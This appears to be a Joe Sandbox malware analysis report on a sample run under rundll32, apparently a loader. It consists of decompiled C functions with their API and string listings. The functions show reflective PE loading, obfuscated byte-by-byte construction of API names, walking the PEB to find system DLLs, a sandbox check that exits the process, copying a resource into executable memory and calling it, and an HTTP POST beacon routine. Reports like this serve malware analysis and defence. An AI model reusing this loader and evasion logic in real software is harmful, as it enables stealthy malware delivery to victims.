    				 *0x4853024 = GetProcAddress(_v8, "strncmp");
    				 *0x4853008 = GetProcAddress(_v8, "free");
    				 *0x485300c = GetProcAddress(_v8, "malloc");
    				 *0x4853014 = GetProcAddress(_v12, "CreateDirectoryA");
    				 *0x4853018 = GetProcAddress(_v12, "CreateProcessA");
    				 *0x485301c = GetProcAddress(_v12, "DeleteFileA");
    				 *0x4853028 = GetProcAddress(_v8, "memset");
    				 *0x4853030 = GetProcAddress(_v8, "memcpy");
    				 *0x485302c = GetProcAddress(_v8, "strstr"); // executed
    				E04851040(); // executed
    				_t32 = E048510B0(_t40); // executed
    				return _t32;
    			}







    Address column: 0x048511b1 - 0x048512ab

    APIs
    • LoadLibraryA.KERNEL32(msvcrt.dll), ref: 048511AB
    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 048511B9
    • GetProcAddress.KERNEL32(00000001,realloc), ref: 048511CB
    • GetProcAddress.KERNEL32(00000001,exit), ref: 048511DF
    • GetProcAddress.KERNEL32(00000001,strncmp), ref: 048511F3
    • GetProcAddress.KERNEL32(00000001,free), ref: 04851207
    • GetProcAddress.KERNEL32(00000001,malloc), ref: 0485121B
    • GetProcAddress.KERNEL32(?,CreateDirectoryA), ref: 0485122F
    • GetProcAddress.KERNEL32(?,CreateProcessA), ref: 04851243
    • GetProcAddress.KERNEL32(?,DeleteFileA), ref: 04851257
    • GetProcAddress.KERNEL32(00000001,memset), ref: 0485126B
    • GetProcAddress.KERNEL32(00000001,memcpy), ref: 0485127F
    • GetProcAddress.KERNEL32(00000001,strstr), ref: 04851293
      • Part of subcall function 04851040: CreateDirectoryA.KERNELBASE(?,00000000,?,?,?,?,?,?,048512A3), ref: 0485108A
      • Part of subcall function 048510B0: Sleep.KERNEL32(00003A98), ref: 04851166
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.665004317.0000000004851000.00000020.00000001.sdmp, Offset: 04850000, based on PE: true
    • Associated: 00000003.00000002.664819390.0000000004850000.00000004.00000001.sdmp
    • Associated: 00000003.00000002.666866498.0000000004852000.00000002.00000001.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_4850000_rundll32.jbxd
    Similarity
    • API ID: AddressProc$LibraryLoad$CreateDirectorySleep
    • String ID: CreateDirectoryA$CreateProcessA$DeleteFileA$exit$free$kernel32.dll$malloc$memcpy$memset$msvcrt.dll$realloc$strncmp$strstr
    • API String ID: 2158191583-3107153655
    • Opcode ID: 1cd38dbcaeb0a4ccf2370516527b8a6636543a49cb01bc176f0e33b993be3a31
    • Instruction ID: 31db8aa28d8badaaeed6238bb77f80025b92081a2d471e95a5bad477d22d040e
    • Opcode Fuzzy Hash: 1cd38dbcaeb0a4ccf2370516527b8a6636543a49cb01bc176f0e33b993be3a31
    • Instruction Fuzzy Hash: 8521A5B9A81304EF9710FFA0ED4996B7B79FA486817100E95EE0192710DE7CAE00EF60
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    control_flow_graph: [interactive control-flow graph for 11b1b50-11b1f6d; legend: Executed / Not Executed]
    C-Code - Quality: 90%
    			E011B1B50(intOrPtr __ecx, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
    				void* _v8;
    				intOrPtr* _v12;
    				void* _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				signed short* _v28;
    				void* _v32;
    				void* _v36;
    				void* _v40;
    				long _v44;
    				void* _v48;
    				void* _v52;
    				intOrPtr _v56;
    				intOrPtr _v60;
    				intOrPtr _v64;
    				intOrPtr _v68;
    				intOrPtr _v100;
    				char _v104;
    				void* _t184;
    				void* _t195;
    				void* _t202;
    				void* _t205;
    				void* _t206;
    				void* _t223;
    				intOrPtr _t320;
    
    				_v20 = __ecx;
    				_v8 = 0;
    				_v40 = 0;
    				if(E011B1270(_v20, _a8, 0x40) != 0) {
    					_v28 = _a4;
    					if(( *_v28 & 0x0000ffff) == 0x5a4d) {
    						if(E011B1270(_v20, _a8, _v28[0x1e] + 0xf8) != 0) {
    							_v12 = _a4 + _v28[0x1e];
    							if( *_v12 == 0x4550) {
    								_t19 = _v12 + 4; // 0x3
    								if(( *_t19 & 0x0000ffff) == 0x14c) {
    									_t21 = _v12 + 0x38; // 0x0
    									if(( *_t21 & 0x00000001) == 0) {
    										_t23 = _v12 + 0x14; // 0x0
    										_t26 = ( *_t23 & 0x0000ffff) + 0x18; // 0x11b4018
    										_v24 = _v12 + _t26;
    										_t29 = _v12 + 0x38; // 0x0
    										_v60 =  *_t29;
    										_v32 = 0;
    										while(1) {
    											_t37 = _v12 + 6; // 0x40000
    											if(_v32 >= ( *_t37 & 0x0000ffff)) {
    												break;
    											}
    											if( *((intOrPtr*)(_v24 + 0x10)) != 0) {
    												_v36 =  *((intOrPtr*)(_v24 + 0xc)) +  *((intOrPtr*)(_v24 + 0x10));
    											} else {
    												_v36 =  *((intOrPtr*)(_v24 + 0xc)) + _v60;
    											}
    											if(_v36 > _v40) {
    												_v40 = _v36;
    											}
    											_v32 = _v32 + 1;
    											_v24 = _v24 + 0x28;
    										}
    										__imp__GetNativeSystemInfo( &_v104); // executed
    										_t56 = _v12 + 0x50; // 0x70207369
    										_t59 = _v100 - 1; // 0x70207368
    										_v44 =  *_t56 + _t59 &  !(_v100 - 1);
    										_t65 = _v100 - 1; // -1
    										if(_v44 == (_v40 + _t65 &  !(_v100 - 1))) {
    											_t70 = _v12 + 0x34; // 0x0
    											_t184 = VirtualAlloc( *_t70, _v44, 0x3000, 4); // executed
    											_v16 = _t184;
    											if(_v16 != 0) {
    												L26:
    												_v8 = HeapAlloc(GetProcessHeap(), 8, 0x34);
    												if(_v8 != 0) {
    													 *((intOrPtr*)(_v8 + 4)) = _v16;
    													_t83 = _v12 + 0x16; // 0x400000
    													if(( *_t83 & 0x2000) == 0) {
    														_v48 = 0;
    													} else {
    														_v48 = 1;
    													}
    													 *(_v8 + 0x14) = _v48;
    													 *((intOrPtr*)(_v8 + 0x1c)) = _a12;
    													 *((intOrPtr*)(_v8 + 0x20)) = _a16;
    													 *((intOrPtr*)(_v8 + 0x24)) = _a20;
    													 *((intOrPtr*)(_v8 + 0x28)) = _a24;
    													 *((intOrPtr*)(_v8 + 0x30)) = _v100;
    													_t105 = _v12 + 0x54; // 0x72676f72
    													if(E011B1270(_v20, _a8,  *_t105) != 0) {
    														_t109 = _v12 + 0x54; // 0x72676f72
    														_t195 = VirtualAlloc(_v16,  *_t109, 0x1000, 4); // executed
    														_v52 = _t195;
    														_t113 = _v12 + 0x54; // 0x72676f72
    														E011B10D0(_v52, _v28,  *_t113);
    														 *_v8 = _v52 + _v28[0x1e];
    														 *((intOrPtr*)( *_v8 + 0x34)) = _v16;
    														_t202 = E011B12A0(_v20, _a4, _a8, _v12, _v8); // executed
    														if(_t202 != 0) {
    															_t131 = _v12 + 0x34; // 0x0
    															_t320 =  *((intOrPtr*)( *_v8 + 0x34)) -  *_t131;
    															_v56 = _t320;
    															if(_t320 == 0) {
    																 *((intOrPtr*)(_v8 + 0x18)) = 1;
    															} else {
    																 *((intOrPtr*)(_v8 + 0x18)) = E011B17B0(_v20, _v8, _v56);
    															}
    															_t205 = E011B18C0(_v20, _v8); // executed
    															if(_t205 != 0) {
    																_t206 = E011B15B0(_v20, _v8); // executed
    																if(_t206 != 0) {
    																	if(E011B1730(_v20, _v8) != 0) {
    																		if( *((intOrPtr*)( *_v8 + 0x28)) == 0) {
    																			 *(_v8 + 0x2c) = 0;
    																			L52:
    																			return _v8;
    																		}
    																		if( *(_v8 + 0x14) == 0) {
    																			 *(_v8 + 0x2c) = _v16 +  *((intOrPtr*)( *_v8 + 0x28));
    																			L50:
    																			goto L52;
    																		}
    																		_v64 = _v16 +  *((intOrPtr*)( *_v8 + 0x28));
    																		_v68 = _v64(_v16, 1, 0);
    																		if(_v68 != 0) {
    																			 *((intOrPtr*)(_v8 + 0x10)) = 1;
    																			goto L50;
    																		}
    																		SetLastError(0x45a);
    																		goto L53;
    																	}
    																	goto L53;
    																}
    																goto L53;
    															}
    															goto L53;
    														}
    														goto L53;
    													} else {
    														L53:
    														E011B2120(_v20, _v8);
    														return 0;
    													}
    												}
    												VirtualFree(_v16, 0, 0x8000);
    												SetLastError(0xe);
    												return 0;
    											}
    											_t223 = VirtualAlloc(0, _v44, 0x3000, 4); // executed
    											_v16 = _t223;
    											if(_v16 != 0) {
    												goto L26;
    											}
    											SetLastError(0xe);
    											return 0;
    										}
    										SetLastError(0xc1);
    										return 0;
    									}
    									SetLastError(0xc1);
    									return 0;
    								}
    								SetLastError(0xc1);
    								return 0;
    							}
    							SetLastError(0xc1);
    							return 0;
    						}
    						return 0;
    					}
    					SetLastError(0xc1);
    					return 0;
    				}
    				return 0;
    			}




























    Address column: 0x011b1b56 - 0x011b1f68

    APIs
      • Part of subcall function 011B1270: SetLastError.KERNEL32(0000000D,?,?,011B1B75,011B1025,00000040), ref: 011B1281
    • SetLastError.KERNEL32(000000C1,011B1025,00000040), ref: 011B1B98
    Memory Dump Source
    • Source File: 00000003.00000002.662633575.00000000011B1000.00000020.00000001.sdmp, Offset: 011B0000, based on PE: true
    • Associated: 00000003.00000002.662614711.00000000011B0000.00000004.00000001.sdmp
    • Associated: 00000003.00000002.662646662.00000000011B3000.00000002.00000001.sdmp
    • Associated: 00000003.00000002.662686050.00000000011B4000.00000004.00000001.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_11b0000_rundll32.jbxd
    Similarity
    • API ID: ErrorLast
    • String ID:
    • API String ID: 1452528299-0
    • Opcode ID: 12b0e6a17476fd38cb820aeb16230bea20be3a3774c4f56e493efd9025ae4ed3
    • Instruction ID: 192dff59822bd5d366d81e63a860fd4192e890f47ad625c6df332ec8d88478e2
    • Opcode Fuzzy Hash: 12b0e6a17476fd38cb820aeb16230bea20be3a3774c4f56e493efd9025ae4ed3
    • Instruction Fuzzy Hash: E2E1D674A10209EFDB08CF98D9E4AEEBBB1BF48304F118559E915AB385D730AE85CF51
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    control_flow_graph: [interactive control-flow graph for 4851640-4851a03; legend: Executed / Not Executed]
    APIs
    • wsprintfA.USER32 ref: 0485173A
    • WSAStartup.WS2_32(00000102,?), ref: 0485174F
    • socket.WS2_32(00000002,00000001,00000006), ref: 04851766
    • gethostbyname.WS2_32(?), ref: 04851779
    • htons.WS2_32(?), ref: 0485178D
    • connect.WS2_32(?,?,00000010), ref: 048517D2
    • send.WS2_32(?,?,?,00000000), ref: 04851854
    • recv.WS2_32(?,?,00000BB8,00000000), ref: 048518C1
    Strings
    • POST %s HTTP/1.1Host: %sPragma: no-cacheContent-Length: %d%s, xrefs: 0485172E
    • ping, xrefs: 04851657
    Memory Dump Source
    • Source File: 00000003.00000002.665004317.0000000004851000.00000020.00000001.sdmp, Offset: 04850000, based on PE: true
    • Associated: 00000003.00000002.664819390.0000000004850000.00000004.00000001.sdmp
    • Associated: 00000003.00000002.666866498.0000000004852000.00000002.00000001.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_4850000_rundll32.jbxd
    Similarity
    • API ID: Startupconnectgethostbynamehtonsrecvsendsocketwsprintf
    • String ID: POST %s HTTP/1.1Host: %sPragma: no-cacheContent-Length: %d%s$ping
    • API String ID: 1466141387-1232505173
    • Opcode ID: abd8a5559fa4e9926b4bd933dea71345106d599176918da7ebd5cac41c17645b
    • Instruction ID: b902c569344a0c09ae7c169a3f1b4a50396d150d24cec4c5e5f08ec9e8711290
    • Opcode Fuzzy Hash: abd8a5559fa4e9926b4bd933dea71345106d599176918da7ebd5cac41c17645b
    • Instruction Fuzzy Hash: 4BB1F474D042A89BDB20DF68DD84BD9B7B5AF48304F008AC9E58DE7245DBB46AC4CF51
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    control_flow_graph: [interactive control-flow graph for 11a1030-11a1490; legend: Executed / Not Executed]
    APIs
    • LoadLibraryW.KERNEL32(011A4054,011A4040), ref: 011A1047
    • GetProcAddress.KERNEL32(00000000), ref: 011A104E
      • Part of subcall function 011A1B30: SetLastError.KERNEL32(0000000D,?,011A1070,?,00000040), ref: 011A1B3D
    • SetLastError.KERNEL32(000000C1), ref: 011A1096
    Memory Dump Source
    • Source File: 00000003.00000002.662490371.00000000011A1000.00000020.00000001.sdmp, Offset: 011A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_11a1000_rundll32.jbxd
    Similarity
    • API ID: ErrorLast$AddressLibraryLoadProc
    • String ID:
    • API String ID: 1866314245-0
    • Opcode ID: a13422e5fd71005870062d6bc94ed78f1339e51adbe0aa8c75cb91b0db5b0a2d
    • Instruction ID: b635f8b3e635fff1d3250391d6c50124b43ae7d0f39efc9309cb47f0b06ee3dd
    • Opcode Fuzzy Hash: a13422e5fd71005870062d6bc94ed78f1339e51adbe0aa8c75cb91b0db5b0a2d
    • Instruction Fuzzy Hash: 48F1DDB8E00209EFDB08CF98D984AAEBBB1FF48314F608559E915AB341D775EE41CB51
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    control_flow_graph: [interactive control-flow graph for 10001140-1000143e; legend: Executed / Not Executed]
    APIs
    • LoadLibraryW.KERNEL32(advapi32.dll,00000000,?,768FFF80,00000000,?,?,?,?,10001910,mzhN!<iB1VQsqma,00000001,00000000,?), ref: 10001163
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.668407668.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.668390582.0000000010000000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.668432316.0000000010002000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.668446107.0000000010003000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.668456462.0000000010004000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID: LibraryLoad
    • String ID: CryptAcquireContextW$CryptEncrypt$CryptImportKey$MZ$advapi32.dll
    • API String ID: 1029625771-2099056292
    • Opcode ID: 8be17151d487c284eccf1f61c66e01e235dd7159d25684441548e50fe222385c
    • Instruction ID: f1e3da2b060832eca0575a2289e7c1b66ec671b800c50b1afc0d0a00f9ebe04d
    • Opcode Fuzzy Hash: 8be17151d487c284eccf1f61c66e01e235dd7159d25684441548e50fe222385c
    • Instruction Fuzzy Hash: 4F9105706083428FE714CF15C8C0AABBBE9EFC97C8F10456DE8859B30AD632D906CB91
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    control_flow_graph: [interactive control-flow graph for 10001530-10001944; legend: Executed / Not Executed]
    C-Code - Quality: 68%
    			E10001530() {
    				char _v3;
    				char _v4;
    				char _v5;
    				char _v6;
    				char _v7;
    				char _v8;
    				char _v9;
    				char _v10;
    				char _v11;
    				char _v12;
    				char _v13;
    				char _v14;
    				char _v15;
    				char _v16;
    				char _v17;
    				char _v18;
    				char _v19;
    				char _v20;
    				char _v23;
    				char _v24;
    				char _v25;
    				char _v26;
    				char _v27;
    				char _v28;
    				char _v29;
    				char _v30;
    				char _v31;
    				char _v32;
    				char _v33;
    				char _v34;
    				char _v35;
    				char _v36;
    				char _v37;
    				char _v38;
    				char _v39;
    				char _v40;
    				char _v44;
    				char _v45;
    				char _v46;
    				char _v47;
    				char _v48;
    				char _v49;
    				char _v50;
    				char _v51;
    				char _v52;
    				char _v53;
    				char _v54;
    				char _v55;
    				char _v56;
    				intOrPtr _v60;
    				intOrPtr _v64;
    				char _v68;
    				char _v72;
    				intOrPtr _v76;
    				intOrPtr _v80;
    				intOrPtr _v84;
    				signed int _v88;
    				void* _v92;
    				void* _v96;
    				signed int _v100;
    				void* _v104;
    				void* _v112;
    				long _v116;
    				intOrPtr* _t140;
    				intOrPtr _t143;
    				intOrPtr _t144;
    				intOrPtr* _t146;
    				intOrPtr* _t148;
    				void* _t153;
    				char* _t165;
    				void* _t167;
    				void* _t169;
    				char* _t170;
    				intOrPtr* _t173;
    				intOrPtr* _t174;
    				void* _t175;
    				void* _t177;
    				intOrPtr _t180;
    				short* _t181;
    				intOrPtr _t182;
    				signed int _t185;
    				signed int _t186;
    				char _t193;
    				short _t194;
    				char _t195;
    				short _t196;
    				intOrPtr _t199;
    				void* _t205;
    				intOrPtr _t211;
    				intOrPtr _t214;
    				void* _t216;
    				signed int _t225;
    				void* _t227;
    				signed int _t228;
    				void* _t230;
    				intOrPtr _t232;
    				intOrPtr _t233;
    				intOrPtr* _t234;
    				void* _t235;
    				char _t237;
    				void* _t240;
    				char _t243;
    				intOrPtr _t247;
    				intOrPtr* _t249;
    				intOrPtr _t252;
    				void* _t253;
    				void* _t265;
    				void* _t284;
    
    				_t253 =  &_v100;
    				if(E10001100() != 0) {
    					ExitProcess(0xffffe678);
    				}
    				_v32 = 0x65;
    				_v26 = 0x65;
    				_v14 = 0x65;
    				_v10 = 0x65;
    				_v4 = 0x65;
    				_t230 = 0;
    				 *0x10003174 = 0xf;
    				_v88 = 0;
    				_v100 = 0;
    				_v40 = 0x4c;
    				_v39 = 0x64;
    				_v38 = 0x72;
    				_v37 = 0x46;
    				_v36 = 0x69;
    				_v35 = 0x6e;
    				_v34 = 0x64;
    				_v33 = 0x52;
    				_v31 = 0x73;
    				_v30 = 0x6f;
    				_v29 = 0x75;
    				_v28 = 0x72;
    				_v27 = 0x63;
    				_v25 = 0x5f;
    				_v24 = 0x55;
    				_v23 = 0;
    				_v20 = 0x4c;
    				_v19 = 0x64;
    				_v18 = 0x72;
    				_v17 = 0x41;
    				_v16 = 0x63;
    				_v15 = 0x63;
    				_v13 = 0x73;
    				_v12 = 0x73;
    				_v11 = 0x52;
    				_v9 = 0x73;
    				_v8 = 0x6f;
    				_v7 = 0x75;
    				_v6 = 0x72;
    				_v5 = 0x63;
    				_v3 = 0;
    				_v56 = 0x56;
    				_v55 = 0x69;
    				_v54 = 0x72;
    				_v53 = 0x74;
    				_v52 = 0x75;
    				_v51 = 0x61;
    				_v50 = 0x6c;
    				_v49 = 0x41;
    				_v48 = 0x6c;
    				_v47 = 0x6c;
    				_v46 = 0x6f;
    				_v45 = 0x63;
    				_v44 = 0;
    				_t180 =  *((intOrPtr*)(E100010E0(0x6c) + 0xc));
    				_t140 =  *((intOrPtr*)(_t180 + 0xc));
    				_t173 = _t140;
    				_v76 =  *((intOrPtr*)(_t180 + 0x10));
    				if(_t140 == 0) {
    					L20:
    					_t181 = 0;
    				} else {
    					while( *((intOrPtr*)(_t173 + 0x18)) != _t230) {
    						_t252 =  *((intOrPtr*)(_t173 + 0x30));
    						if(_t252 == _t230) {
    							L19:
    							if(_t173 != _t230) {
    								continue;
    							} else {
    								goto L20;
    							}
    						} else {
    							_t228 = 0;
    							_t265 = L"kernel32.dll" - _t230; // 0x6b
    							if(_t265 != 0) {
    								_t170 = L"kernel32.dll";
    								_t216 = _t252 - _t170;
    								while( *((short*)(_t216 + _t170)) != 0) {
    									_t195 =  *_t170;
    									if(_t195 <= 0x5a && _t195 >= 0x41) {
    										_t195 = _t195 + 0x20;
    										 *_t170 = _t195;
    									}
    									_t243 = _t195;
    									_t196 =  *((intOrPtr*)(_t216 + _t170));
    									if(_t196 <= 0x5a && _t196 >= 0x41) {
    										_t196 = _t196 + 0x20;
    										 *((short*)(_t216 + _t170)) = _t196;
    									}
    									if(_t243 == _t196) {
    										_t170 =  &(_t170[2]);
    										_t228 = _t228 + 1;
    										if( *_t170 != 0) {
    											continue;
    										}
    									}
    									goto L16;
    								}
    							}
    							L16:
    							_t230 = 0;
    							if( *((intOrPtr*)(L"kernel32.dll" + _t228 * 2)) != 0 ||  *((intOrPtr*)(_t252 + _t228 * 2)) != 0) {
    								_t173 =  *_t173;
    								goto L19;
    							} else {
    								_t181 =  *((intOrPtr*)(_t173 + 0x18));
    							}
    						}
    						goto L21;
    					}
    					goto L20;
    				}
    				L21:
    				if( *_t181 == 0x5a4d) {
    					_t143 =  *((intOrPtr*)( *((intOrPtr*)(_t181 + 0x3c)) + _t181 + 0x78));
    					if(_t143 != _t230) {
    						_t199 =  *((intOrPtr*)(_t143 + _t181 + 0x18));
    						_v84 =  *((intOrPtr*)(_t143 + _t181 + 0x1c));
    						_t232 =  *((intOrPtr*)(_t143 + _t181 + 0x20));
    						_t144 =  *((intOrPtr*)(_t143 + _t181 + 0x24));
    						_v80 = _t199;
    						_v92 = 0;
    						if(_t199 <= 0) {
    							L35:
    							_v96 = 0;
    						} else {
    							_t177 = _t144 + _t181;
    							_v96 = _t232 + _t181;
    							do {
    								_t249 = _v84 + _t181;
    								_t167 = 0;
    								_t240 =  *_v96 + _t181;
    								_t227 = _t240 -  &_v56;
    								while(1) {
    									_t211 =  *((intOrPtr*)(_t253 + _t227 + _t167 + 0x3c));
    									if(_t211 == 0 ||  *((intOrPtr*)(_t253 + _t167 + 0x3c)) != _t211) {
    										break;
    									}
    									_t214 =  *((intOrPtr*)(_t253 + _t167 + 0x3d));
    									_t167 = _t167 + 1;
    									if(_t214 != 0) {
    										continue;
    									}
    									break;
    								}
    								if( *((intOrPtr*)(_t253 + _t167 + 0x3c)) != 0 ||  *((char*)(_t167 + _t240)) != 0) {
    									goto L34;
    								} else {
    									_v96 =  *_t249 + _t181;
    								}
    								goto L36;
    								L34:
    								_t169 = _v92 + 1;
    								_t177 = _t177 + 2;
    								_v92 = _t169;
    								_v96 = _v96 + 4;
    							} while (_t169 < _v80);
    							goto L35;
    						}
    					} else {
    						_v96 = _t230;
    					}
    				} else {
    					_v96 = _t230;
    				}
    				L36:
    				_t182 =  *((intOrPtr*)(E100010E0(_t181) + 0xc));
    				_t146 =  *((intOrPtr*)(_t182 + 0xc));
    				_t174 = _t146;
    				_v76 =  *((intOrPtr*)(_t182 + 0x10));
    				if(_t146 == 0) {
    					L57:
    					_t233 = 0;
    				} else {
    					while( *((intOrPtr*)(_t174 + 0x18)) != 0) {
    						_t247 =  *((intOrPtr*)(_t174 + 0x30));
    						if(_t247 == 0) {
    							L53:
    							if(_t174 != 0) {
    								continue;
    							} else {
    								goto L57;
    							}
    						} else {
    							_t225 = 0;
    							_t284 = L"ntdll.dll" - _t225; // 0x6e
    							if(_t284 != 0) {
    								_t165 = L"ntdll.dll";
    								_t205 = _t247 - _t165;
    								while( *((short*)(_t205 + _t165)) != 0) {
    									_t193 =  *_t165;
    									if(_t193 <= 0x5a && _t193 >= 0x41) {
    										_t193 = _t193 + 0x20;
    										 *_t165 = _t193;
    									}
    									_t237 = _t193;
    									_t194 =  *((intOrPtr*)(_t205 + _t165));
    									if(_t194 <= 0x5a && _t194 >= 0x41) {
    										_t194 = _t194 + 0x20;
    										 *((short*)(_t205 + _t165)) = _t194;
    									}
    									if(_t237 == _t194) {
    										_t165 =  &(_t165[2]);
    										_t225 = _t225 + 1;
    										if( *_t165 != 0) {
    											continue;
    										}
    									}
    									goto L50;
    								}
    							}
    							L50:
    							if( *((short*)(L"ntdll.dll" + _t225 * 2)) != 0 ||  *((short*)(_t247 + _t225 * 2)) != 0) {
    								_t174 =  *_t174;
    								goto L53;
    							} else {
    								_t233 =  *((intOrPtr*)(_t174 + 0x18));
    							}
    						}
    						goto L58;
    					}
    					goto L57;
    				}
    				L58:
    				_push( &_v40);
    				_push(_t233);
    				_t148 = E10001440();
    				_push( &_v20);
    				_push(_t233);
    				_t234 = E10001440();
    				_push( &_v72);
    				_push(3);
    				_push( &_v68);
    				_push(0x10000000);
    				_v68 = 0xb;
    				_v64 = 0x8a3;
    				_v60 = 0x409;
    				if( *_t148() >= 0) {
    					 *_t234(0x10000000, _v88,  &_v104,  &_v116);
    				}
    				_t153 = VirtualAlloc(0, _v116, 0x3000, atoi("64"));
    				_t185 = _v116;
    				_t235 = _v104;
    				_t175 = _t153;
    				_t186 = _t185 >> 2;
    				_push(memcpy(_t175, _t235, _t186 << 2));
    				_push(_t175);
    				_push(1);
    				memcpy(_t235 + _t186 + _t186, _t235, _t185 & 0x00000003);
    				if(E10001140("mzhN!<iB1VQsqma") != 0) {
    					L62:
    					 *_t175();
    				} else {
    					_push( &_v116);
    					_push(_t175);
    					_push(atoi("16"));
    					if(E10001140("mzhN!<iB1VQsqma") != 0) {
    						goto L62;
    					}
    				}
    				return 0;
    			}

    APIs
      • Part of subcall function 10001100: LoadLibraryW.KERNEL32(ntdll.dll,ZwOpenSymbolicLinkObject,?,10001538), ref: 1000110B
      • Part of subcall function 10001100: GetProcAddress.KERNEL32(00000000), ref: 10001112
    • ExitProcess.KERNEL32 ref: 10001541
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.668407668.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.668390582.0000000010000000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.668432316.0000000010002000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.668446107.0000000010003000.00000004.00020000.sdmp Download File
    • Associated: 00000003.00000002.668456462.0000000010004000.00000002.00020000.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID: AddressExitLibraryLoadProcProcess
    • String ID: A$A$F$L$L$R$R$U$V$_$a$d$d$d$i$i$kernel32.dll$mzhN!<iB1VQsqma$n$ntdll.dll$o$o$o$t$u$u$u
    • API String ID: 881411216-724902985
    • Opcode ID: d5cd14736a5a78d3d26fe2b51d0aa306070cc927f9ad5da38bcc108a3d724817
    • Instruction ID: 4276e2de53327d2340dd9adc1b77db750b573dbbb898802e8b477a806e705720
    • Opcode Fuzzy Hash: d5cd14736a5a78d3d26fe2b51d0aa306070cc927f9ad5da38bcc108a3d724817
    • Instruction Fuzzy Hash: 1AC1A27150C3818FE312DB68C88069BBBE5EF96784F48885DE5C44B346D7B5D988C7A3
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 332 11a21a0-11a21d1 333 11a21dd-11a2201 IsBadHugeReadPtr 332->333 334 11a21d3-11a21d8 332->334 337 11a23c0 333->337 338 11a2207-11a220e 333->338 335 11a23c3-11a23c6 334->335 337->335 338->337 339 11a2214-11a2237 338->339 341 11a2239-11a2248 SetLastError 339->341 342 11a224d-11a2262 call 11a1a20 339->342 341->337 344 11a2267-11a2271 342->344 345 11a229d-11a22cd 344->345 346 11a2273-11a2298 SetLastError 344->346 347 11a22e8-11a22fd 345->347 348 11a22cf-11a22e6 345->348 346->337 350 11a2300 347->350 348->350 351 11a2314-11a231a 350->351 352 11a231c-11a2327 351->352 353 11a2395-11a2399 351->353 356 11a2329-11a2350 352->356 357 11a2352-11a237d 352->357 354 11a23bb 353->354 355 11a239b-11a23b9 SetLastError 353->355 354->337 355->337 361 11a237f-11a2385 356->361 357->361 362 11a2390 361->362 363 11a2387-11a238e 361->363 362->351 363->353
    APIs
    • IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 011A21F9
    • SetLastError.KERNEL32(0000007E), ref: 011A223B
    Memory Dump Source
    • Source File: 00000003.00000002.662490371.00000000011A1000.00000020.00000001.sdmp, Offset: 011A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_11a1000_rundll32.jbxd
    Similarity
    • API ID: ErrorHugeLastRead
    • String ID:
    • API String ID: 3239643929-0
    • Opcode ID: 111c4d34bdb4af217c117a5afb76bc0bb574fe7b9e18a7490bdf2fce3b8ae7c1
    • Instruction ID: 3ee8d4d26f2e0f733e73ab24517ca362e105c0a48e31becc95d044a0af268bca
    • Opcode Fuzzy Hash: 111c4d34bdb4af217c117a5afb76bc0bb574fe7b9e18a7490bdf2fce3b8ae7c1
    • Instruction Fuzzy Hash: E081BB78A04209DFDB08CF98C890BADBBB1FF49314F558158E919AB355C734EA85CF91
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 365 11b18c0-11b18f4 366 11b1900-11b1924 IsBadReadPtr 365->366 367 11b18f6-11b18fb 365->367 370 11b192a-11b1931 366->370 371 11b1ae3 366->371 368 11b1ae6-11b1ae9 367->368 370->371 372 11b1937-11b195a call 11b1af0 370->372 371->368 374 11b195c-11b196b SetLastError 372->374 375 11b1970-11b1985 call 11b1170 372->375 374->371 377 11b198a-11b1994 375->377 378 11b19c0-11b19f0 377->378 379 11b1996-11b19bb SetLastError 377->379 380 11b1a0b-11b1a20 378->380 381 11b19f2-11b1a09 378->381 379->371 383 11b1a23 380->383 381->383 384 11b1a37-11b1a3d 383->384 385 11b1ab8-11b1abc 384->385 386 11b1a3f-11b1a4a 384->386 387 11b1ade 385->387 388 11b1abe-11b1adc SetLastError 385->388 389 11b1a4c-11b1a73 386->389 390 11b1a75-11b1aa0 386->390 387->371 388->371 394 11b1aa2-11b1aa8 389->394 390->394 395 11b1aaa-11b1ab1 394->395 396 11b1ab3 394->396 395->385 396->384
    C-Code - Quality: 37%
    			E011B18C0(intOrPtr __ecx, intOrPtr* _a4) {
    				void* _v8;
    				signed int* _v12;
    				intOrPtr _v16;
    				intOrPtr* _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				intOrPtr* _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				intOrPtr _v44;
    				intOrPtr _t114;
    				intOrPtr _t117;
    				intOrPtr _t135;
    				intOrPtr _t140;
    				void* _t206;
    				void* _t207;
    
    				_v44 = __ecx;
    				_t3 = _a4 + 4; // 0x3
    				_v16 =  *_t3;
    				_v28 = 1;
    				_v32 =  *_a4 + 0xbadc25;
